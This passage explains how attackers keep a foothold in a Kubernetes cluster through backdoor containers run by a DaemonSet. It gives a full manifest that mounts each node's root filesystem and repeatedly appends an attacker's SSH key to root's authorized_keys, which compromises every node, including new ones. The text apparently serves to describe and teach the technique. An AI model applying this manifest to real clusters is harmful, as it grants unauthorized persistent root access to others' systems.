Attackers run their malicious code in a container in the cluster. By using the Kubernetes controllers such as DaemonSets or Deployments, attackers can ensure that a constant number of containers run in one, or all, the nodes in the cluster.
One of the simplest and on the same time most efficient ways to deploy backdoor containers is the usage of a DaemonSet. The following adds the attacker’s SSH key to the authorized_keys
file on every node in the cluster every 10 minutes (600 seconds). As a DaemonSet automatically makes sure to deploy a pod on each node, this means also newly added nodes will immediately be compromised when the become available.
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: evil-daemonset
labels:
app: evil-daemonset
spec:
selector:
matchLabels:
app: evil-daemonset
template:
metadata:
labels:
app: evil-daemonset
spec:
containers:
- name: evil
image: ubuntu
command: [ "/bin/sh", "-c", "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAAB3NzaC1y...CUkwfwh+iSTP' >> /host/root/.ssh/authorized_keys && sleep 600" ]
volumeMounts:
- name: host
mountPath: /host
volumes:
- name: host
hostPath:
path: /
Please note that this is a quick and dirty example only made for demonstration purposes and the authorized_keys
file will be filled up over time.